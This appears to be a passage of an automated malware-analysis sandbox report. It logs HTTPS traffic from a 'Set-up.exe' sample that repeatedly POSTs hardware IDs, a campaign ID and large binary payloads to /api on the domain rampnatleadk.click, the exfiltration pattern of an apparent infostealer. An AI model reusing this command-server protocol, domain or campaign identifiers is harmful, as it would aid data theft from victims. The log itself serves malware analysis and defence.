                                                                                    2025-01-12 14:20:15 UTC15331OUTData Raw: 2d 2d 33 58 45 48 37 4b 47 43 45 46 37 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 33 58 45 48 37 4b 47 43 45 46 37 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 58 45 48 37 4b 47 43 45 46 37 4a 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 33 58 45 48 37 4b 47 43 45
                                                                                    Data Ascii: --3XEH7KGCEF7JXContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--3XEH7KGCEF7JXContent-Disposition: form-data; name="pid"2--3XEH7KGCEF7JXContent-Disposition: form-data; name="lid"fBkCmu--next2k$--3XEH7KGCE
                                                                                    2025-01-12 14:20:15 UTC2804OUTData Raw: 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88
                                                                                    Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                    2025-01-12 14:20:16 UTC1131INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=bd6o4qdoe8o96tcqr76gprm16f; expires=Thu, 08 May 2025 08:06:55 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpmVnCZUcAQWVR%2BZqKFeqOHFFpOTvxLJuIIbTXYjBtKSRSM3UozFhAIMlTbQPIFziok7gP7hNp94c5Z5EMwwIM1VEk%2BGdssXsWT7Ex6To7XNioU0lwf0B8IxWorWFcPAa5cHQ%2B0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc9477ca6c468-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1620&rtt_var=631&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19094&delivery_rate=1702623&cwnd=235&unsent_bytes=0&cid=d7fb594a0292ce83&ts=683&x=0"
                                                                                    2025-01-12 14:20:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449735172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:17 UTC274OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=FISV8E7XM
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8732
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:17 UTC8732OUTData Raw: 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                    Data Ascii: --FISV8E7XMContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--FISV8E7XMContent-Disposition: form-data; name="pid"2--FISV8E7XMContent-Disposition: form-data; name="lid"fBkCmu--next2k$--FISV8E7XMContent-Di
                                                                                    2025-01-12 14:20:17 UTC1135INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=jstpenktcua7uojt4vro3dl0bd; expires=Thu, 08 May 2025 08:06:56 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7MiozCcEGB0vIegGMGHOfprmEU7anUDAJggQXgRgSN0AJneAvAye3NVf0FnI%2BqueuM4RrsktXc35JQj14%2FhbnEzXjZ%2F7Ix3OZr2EtdiPEr3%2F%2F2w6P9N2333Tn6lPyB5W6VXqBo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc94f4be543b7-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1701&rtt_var=671&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9664&delivery_rate=1592148&cwnd=238&unsent_bytes=0&cid=03fee465817317ab&ts=485&x=0"
                                                                                    2025-01-12 14:20:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449736172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:18 UTC279OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=LN94D6SCN5NTA
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20409
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:18 UTC15331OUTData Raw: 2d 2d 4c 4e 39 34 44 36 53 43 4e 35 4e 54 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4c 4e 39 34 44 36 53 43 4e 35 4e 54 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 4e 39 34 44 36 53 43 4e 35 4e 54 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 4c 4e 39 34 44 36 53 43 4e
                                                                                    Data Ascii: --LN94D6SCN5NTAContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--LN94D6SCN5NTAContent-Disposition: form-data; name="pid"3--LN94D6SCN5NTAContent-Disposition: form-data; name="lid"fBkCmu--next2k$--LN94D6SCN
                                                                                    2025-01-12 14:20:18 UTC5078OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                    2025-01-12 14:20:20 UTC1136INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=3fs0fg9krvohmufkc4kk04v0n7; expires=Thu, 08 May 2025 08:06:57 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svE7GNQGtn6uWZv5%2FR%2BD3zide3jFo9UAbwryHRz4JlVGph6oRk6gGrPS2tCG%2BUFlOR86r8%2BHZXuQQd72eIgO0u9vPpuu7LB09azI3oAqh4RslGhrraljkgeCJ%2Fdt5OPpkuasd7c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc9570ad67ce2-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1968&rtt_var=757&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21368&delivery_rate=1428571&cwnd=238&unsent_bytes=0&cid=20f0d734e8021bbc&ts=2170&x=0"
                                                                                    2025-01-12 14:20:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.449737172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:21 UTC284OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=57E1C7PTPJW6B8194RN
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1409
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:21 UTC1409OUTData Raw: 2d 2d 35 37 45 31 43 37 50 54 50 4a 57 36 42 38 31 39 34 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 35 37 45 31 43 37 50 54 50 4a 57 36 42 38 31 39 34 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 37 45 31 43 37 50 54 50 4a 57 36 42 38 31 39 34 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65
                                                                                    Data Ascii: --57E1C7PTPJW6B8194RNContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--57E1C7PTPJW6B8194RNContent-Disposition: form-data; name="pid"1--57E1C7PTPJW6B8194RNContent-Disposition: form-data; name="lid"fBkCmu--ne
                                                                                    2025-01-12 14:20:22 UTC1124INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=hcuh8b1hm45sr9opn6sfe1eam8; expires=Thu, 08 May 2025 08:07:01 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5haaQ17NMGde%2Frs22CCOazIYGUVRBSNecQW9ibFrl1wkckFkuS6wVehQtxOnnO6dUpnGkCVt3fHRvyz7UCKlEwOGZkhpBoqEI0Ztt7XsPgpDWVTBDUacLzQlb0DZKtBWeiUUDw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc96c5cd50f64-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1656&rtt_var=632&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2329&delivery_rate=1717647&cwnd=233&unsent_bytes=0&cid=d3de20084a7c2c0a&ts=489&x=0"
                                                                                    2025-01-12 14:20:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.449741172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:23 UTC278OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=KVHPB4STMIJ
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 549671
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f
                                                                                    Data Ascii: --KVHPB4STMIJContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--KVHPB4STMIJContent-Disposition: form-data; name="pid"1--KVHPB4STMIJContent-Disposition: form-data; name="lid"fBkCmu--next2k$--KVHPB4STMIJCo
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28 a9 ca 7e 63 53 51 f0 df c5 b4 d9 c3 ff 00 ad aa d0 0f de 82 c0 48 43 74 7c 9b 3e 7e 0b 48 9b d5 5f 62 dd de 8d
                                                                                    Data Ascii: <1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(~cSQHCt|>~H_b
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da 61 da da 49 7f 50 02 f1 2f ca 2e 5e 9f b7 19 89 14 20 1c 0d b5 a1 5c c9 d7 18 d0 e3 f7 93 26 8e 49 3d b3 82 14
                                                                                    Data Ascii: F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{aIP/.^ \&I=
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e 62 4c e4 60 8e 00 fd 8c 0c 8c 26 f8 9c 75 e1 d6 28 50 9d cd 19 48 2a a0 55 74 bb 6a a1 8b 72 0f 7f 06 c4 e7 7b
                                                                                    Data Ascii: #5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>bL`&u(PH*Utjr{
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15 02 b7 27 a0 c5 73 a6 99 09 a2 b1 cf 17 ce 25 b0 7f 7c 5f c3 35 e5 af aa 91 c5 fe 1c e7 36 39 38 fd 66 8e a6 06
                                                                                    Data Ascii: H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=1J's%|_5698f
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec dd 26 26 55 88 bd f1 6b ab 92 96 e5 17 6f b2 f4 c4 95 dd 33 39 f8 b7 67 e1 3a 1e b0 a8 ca 81 a7 ce ec 03 d2 b6
                                                                                    Data Ascii: sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D&&Uko39g:
